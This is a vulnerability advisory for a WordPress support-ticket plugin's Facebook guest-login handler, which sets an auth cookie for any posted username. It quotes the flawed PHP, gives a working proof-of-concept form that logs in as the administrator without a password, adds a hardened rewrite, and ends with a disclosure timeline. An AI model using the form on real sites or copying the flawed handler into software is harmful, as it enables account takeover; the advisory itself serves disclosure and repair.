You can log in as anyone without knowing the password because of incorrect usage of wp_set_auth_cookie().
File: wp-support-plus-responsive-ticket-system\includes\admin\loginGuestFacebook.php
<?php
if($_POST['email']=='') die();
// Username comes straight from the POST body; nothing proves the caller owns it.
$user_id = username_exists( $_POST['username'] );
if(!$user_id){
    $user_id=email_exists($_POST['email']);
    if(!$user_id){
        $random_password = wp_generate_password( $length=12, $include_standard_special_chars=false );
        $user_id= wp_create_user( $_POST['username'], $random_password, $_POST['email'] );
        $full_name=explode(' ', $_POST['name']);
        $firstName=(isset($full_name[0]))?$full_name[0]:'';
        $lastName=(isset($full_name[1]))?$full_name[1]:'';
        wp_update_user(
            array(
                'ID' => $user_id,
                'first_name'=>$firstName,
                'last_name'=>$lastName,
                'display_name' => $_POST['name'],
                'role' => 'subscriber'
            )
        );
    }
}
$user_info = get_userdata($user_id);
if ( !is_user_logged_in() ) {
    wp_set_current_user( $user_id, $user_info->user_login );
    // Auth cookie is issued for whatever existing account matched the supplied
    // username, with no password or Facebook token check.
    wp_set_auth_cookie( $user_id );
    do_action( 'wp_login', $user_info->user_login );
}
?>
Proof of Concept
Use the form below:
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
    Username: <input type="text" name="username" value="administrator">
    <input type="hidden" name="email" value="sth">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>
Then you can go to the admin panel.
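A hardened rewrite of the handler, added here as an example and not taken from the plugin or its 8.0.0 fix: it assumes the form posts a Facebook access token in a hypothetical fb_token field and a nonce in a hypothetical wpsp_nonce field, and it derives the account from the token the server verifies instead of from the username field.

```php
<?php
// Added, hardened rewrite of the handler above; not the plugin's own code.
// Assumptions: the form posts a Facebook access token as 'fb_token' and a
// nonce as 'wpsp_nonce' (both field names are hypothetical). Identity comes
// only from the token the server verifies, never from a client-chosen username.
function wpsp_verify_facebook_token( $token ) {
    // Ask the Graph API who owns this token; the email is returned by Facebook,
    // so the client cannot pick which local account it maps to.
    $url      = 'https://graph.facebook.com/me?fields=id,email&access_token=' . rawurlencode( $token );
    $response = wp_remote_get( $url, array( 'timeout' => 10 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        return false;
    }
    $data = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( empty( $data['id'] ) || empty( $data['email'] ) || ! is_email( $data['email'] ) ) {
        return false;
    }
    return $data;
}

function wpsp_login_guest_facebook() {
    // Reject cross-site posts and token-less requests before touching any account.
    check_ajax_referer( 'wpsp_guest_login', 'wpsp_nonce' );
    $token   = isset( $_POST['fb_token'] ) ? sanitize_text_field( wp_unslash( $_POST['fb_token'] ) ) : '';
    $profile = $token ? wpsp_verify_facebook_token( $token ) : false;
    if ( ! $profile ) {
        wp_send_json_error( 'invalid token', 403 );
    }

    $user = get_user_by( 'email', $profile['email'] );
    if ( ! $user ) {
        // Create a low-privilege guest account with a server-chosen login name.
        $user_id = wp_create_user( 'fb_' . $profile['id'], wp_generate_password( 24, true ), $profile['email'] );
        if ( is_wp_error( $user_id ) ) {
            wp_send_json_error( 'cannot create user', 500 );
        }
        wp_update_user( array( 'ID' => $user_id, 'role' => 'subscriber' ) );
        $user = get_user_by( 'id', $user_id );
    } elseif ( user_can( $user, 'manage_options' ) ) {
        // Never let the guest path issue a session for a privileged account.
        wp_send_json_error( 'not allowed', 403 );
    }

    wp_set_current_user( $user->ID, $user->user_login );
    wp_set_auth_cookie( $user->ID );
    do_action( 'wp_login', $user->user_login, $user );
    wp_send_json_success();
}
add_action( 'wp_ajax_nopriv_loginGuestFacebook', 'wpsp_login_guest_facebook' );
```

The two changes that close the hole are that the account is looked up by the email Facebook returns for a verified token, and that an existing privileged account is refused rather than logged in.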
Timeline
- 06-12-2016: Discovered
- 06-12-2016: Could not contact the vendor
- 08-01-2017: Version 8.0.0 released, issue resolved